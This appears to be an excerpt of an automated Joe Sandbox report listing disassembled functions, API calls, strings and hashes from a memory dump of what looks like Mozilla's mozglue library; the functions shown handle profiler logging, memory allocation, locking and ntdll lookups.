Instruction Fuzzy Hash: 720146747003928BDF008FABEA94BE233B5E746759F104525EA0182F84DB74B406CA1F

Function 6C69F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C69F598), ref: 6C69F621

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F637
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F645
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C69F62A

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: ac30b7a3da0f63cb2ecde626f544fcda8337d725f7d8c642dc04f256e4dc61ae
Instruction ID: 0ca6b029334713368cae37ce8458285ea3134e2d024130434b58c9ec30fc0ab5
Opcode Fuzzy Hash: ac30b7a3da0f63cb2ecde626f544fcda8337d725f7d8c642dc04f256e4dc61ae
Instruction Fuzzy Hash: FFF05475200205AFDF006F668C8895A777DEFCA29DF150415FA0583746DB756806876E

Function 6C6905F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C68CFAE,?,?,?,6C6531A7), ref: 6C6905FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C68CFAE,?,?,?,6C6531A7), ref: 6C690616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6531A7), ref: 6C69061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6531A7), ref: 6C690627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C69061B, 6C690625
<jemalloc>, xrefs: 6C6905FA, 6C69060F

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction ID: 48e1536f2f0669c544160619b682af56469d35fc0a8b4f871b052f5e726b8a34
Opcode Fuzzy Hash: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction Fuzzy Hash: 69E08CE2A0101037F6142256BC86DBB761CDBC6134F080039FE0E83341E94ABD1A51FB

Function 6C6605F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction ID: 5d20436572da2bca74fa40327ce16ae1097bfe10773e91a6ef8623a71e3834a3
Opcode Fuzzy Hash: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction Fuzzy Hash: 8AA15AB0A016458FDB24CF2AC594A99FBF1BF49304F44866ED44A97B00E731BA85CF99

Function 6C6B14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6B14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6B14E2
GetCurrentThreadId.KERNEL32 ref: 6C6B1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6B15BA
free.MOZGLUE(?), ref: 6C6B16B4

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction ID: aba4de780e88ec0fbd8ae92ed5aa9381c591fd8fdf4d159ca99d83c8d4769e11
Opcode Fuzzy Hash: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction Fuzzy Hash: 2361F572A007009BDB118F25C880BDEB7B5BF8A308F04851DED8A67711EB31E955CB99

Function 6C6ADC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6ADC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6AD38A,?), ref: 6C6ADC6F
free.MOZGLUE(?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6AD38A,?), ref: 6C6ADD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6AD38A,?), ref: 6C6ADD4A

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction ID: bcadd9162a49f29ceb0e17f71bb7541758fe66ea6d43d186fbb7bff36c009d76
Opcode Fuzzy Hash: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction Fuzzy Hash: 24416BB5A00605DFCB00CF99C88099AB7F5FF89314B654569DE46ABB11D771FC02CB98

Function 6C68F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C68F480

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

CloseHandle.KERNEL32(00000000), ref: 6C68F555

Part of subcall function 6C6614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C661248,6C661248,?), ref: 6C6614C9
Part of subcall function 6C6614B0: memcpy.VCRUNTIME140(?,6C661248,00000000,?,6C661248,?), ref: 6C6614EF

Part of subcall function 6C65EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C65EEE3

CreateFileW.KERNEL32 ref: 6C68F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C68F523

Strings

\oleacc.dll, xrefs: 6C68F4CB

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction ID: 0d1bc788e9566150df40bd87b32a434fe4a46e126bf0021ca286a0276173a7db
Opcode Fuzzy Hash: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction Fuzzy Hash: 4541BF706097109FE720DF29D884A9BB7F4AF95318F504A1CF59083690EB70E949CBAB

Function 6C6B74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6B7526
__Init_thread_footer.LIBCMT ref: 6C6B7566
__Init_thread_footer.LIBCMT ref: 6C6B7597

Strings

kernel32.dll, xrefs: 6C6B7557
UnmapViewOfFile2, xrefs: 6C6B7552

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction ID: 70c3812f21271e644d1c9f7080f2d601ef814584af8e9d41c780a69cb21825ee
Opcode Fuzzy Hash: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction Fuzzy Hash: 1621373270150197CB248FEAD894ED973B5EB87725F054529E80167B80DB31B9118BBF

Function 6C6BC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6BC0E9), ref: 6C6BC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6BC437
FreeLibrary.KERNEL32(?,6C6BC0E9), ref: 6C6BC44C

Strings

NtQueryVirtualMemory, xrefs: 6C6BC431
ntdll.dll, xrefs: 6C6BC413

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction ID: 0baf2aa69d8cf0f9d1a80e002f6a0c30601aa36f70604daba40d504ae963cc98
Opcode Fuzzy Hash: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction Fuzzy Hash: 14E0B670B01302ABDF007F73C9887127BF8AB46745F044516AB0592614EBB0F652CB5F

Function 6C6B75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6B748B,?), ref: 6C6B75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6B75D7
FreeLibrary.KERNEL32(?,6C6B748B,?), ref: 6C6B75EC

Strings

RtlNtStatusToDosError, xrefs: 6C6B75D1
ntdll.dll, xrefs: 6C6B75B3

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 0ed2408e784dd703723be8bc13cc7e9168facbfe92853743f00b8c28fd63a019
Instruction ID: 599b689ad59f66e73d5d34581d44cd022478ec4cd9cadc224c2f026cf24e048d
Opcode Fuzzy Hash: 0ed2408e784dd703723be8bc13cc7e9168facbfe92853743f00b8c28fd63a019
Instruction Fuzzy Hash: 8FE0B671600302ABEF006FE3E9C87817AF8EB46359F108425AA15D6650EFB0B452CF5E

Function 6C6B7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6B7592), ref: 6C6B7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C6B7627
FreeLibrary.KERNEL32(?,6C6B7592), ref: 6C6B763C

Strings

NtUnmapViewOfSection, xrefs: 6C6B7621
ntdll.dll, xrefs: 6C6B7603

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: aff42ef36585dfbf2b3ffed05fcd9c9d21b389548d503c9e2ccb9ff195cd6380
Instruction ID: 4077c0c34e0e82244b259c34acabfe4733f0336438e9aebffaac6e4d6d13d704
Opcode Fuzzy Hash: aff42ef36585dfbf2b3ffed05fcd9c9d21b389548d503c9e2ccb9ff195cd6380
Instruction Fuzzy Hash: 67E0B6B0600342ABDF106FA7E8887817AB8EB5A399F014515EA05D2750EBB1B4119F5E

Function 6C6BBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C6BBE49), ref: 6C6BBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C6BBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C6BBE49), ref: 6C6BBF38
RtlReAllocateHeap.NTDLL ref: 6C6BBF83
RtlFreeHeap.NTDLL(6C6BBE49,00000000), ref: 6C6BBFA6

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: aa7aa61b06619e0ee9a99d85cb4b4e8ec3ed49fbb90f089a08a381adfc3eb9a2
Instruction ID: 41be5e43559ec2933148f037eb97a796bf2ada86dae306781c2001eb55ed4b4d
Opcode Fuzzy Hash: aa7aa61b06619e0ee9a99d85cb4b4e8ec3ed49fbb90f089a08a381adfc3eb9a2
Instruction Fuzzy Hash: 62517D71B002058FE714CF69CDC0BAAB7A6FFC9314F294629D516A7B94D730F9168B84

Function 6C6A8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8EBF
free.MOZGLUE(?,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8F46
free.MOZGLUE(?,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F8F

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 2d5529b490a9ed527ba4d6f3c07105a9ef5ca3ad7d3b13a1296e15702832f637
Instruction ID: 5c8095c7e4d8c3f82490520348ed4036927259d6491a6e53044fc4a20779ecf9
Opcode Fuzzy Hash: 2d5529b490a9ed527ba4d6f3c07105a9ef5ca3ad7d3b13a1296e15702832f637
Instruction Fuzzy Hash: 8251C2B1A012568FEB10CFA4D88066EB7B2FF4D348F15046AD916AB750E731FD06CB99

Function 6C654DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C654EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C654F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C654F1E

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction ID: fa9019ae94530c368e15ab28f76c0ca6e05641a3aa38c6ac439540feb09e902e
Opcode Fuzzy Hash: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction Fuzzy Hash: 8C41F0716087019FC701CF29C8809ABB7E4BF8A344F608A5DF56687640DBB1E935CB85

Function 6C661530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C66159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615BC
moz_xmalloc.MOZGLUE(-00000001,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615E7
free.MOZGLUE(?,?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661637

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction ID: d01c86a85d46c23a7c691215a81a34074b03034866677b6b18a6f6f243d40b0c
Opcode Fuzzy Hash: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction Fuzzy Hash: 9C31EAB1A001149BCB148E7DD8514AEB7A5FB823647240B2DE423DBFD4EB30D915879B

Function 6C6BAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAD9D

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE3D

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction ID: 4eb5dd445afc357e947c968c0e77c1b944aa70b059dce956206679de5e0986f5
Opcode Fuzzy Hash: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction Fuzzy Hash: FB3164B1A002159FDB10DF7A8C44AABB7F8EF49714F15482DE94AE7700E734E815CBA9

Function 6C6B5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C6CDCA0,?,?,?,6C68E8B5,00000000), ref: 6C6B5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C68E8B5,00000000), ref: 6C6B5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C68E8B5,00000000), ref: 6C6B5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C68E8B5,00000000), ref: 6C6B5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C68E8B5,00000000), ref: 6C6B5FD6

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
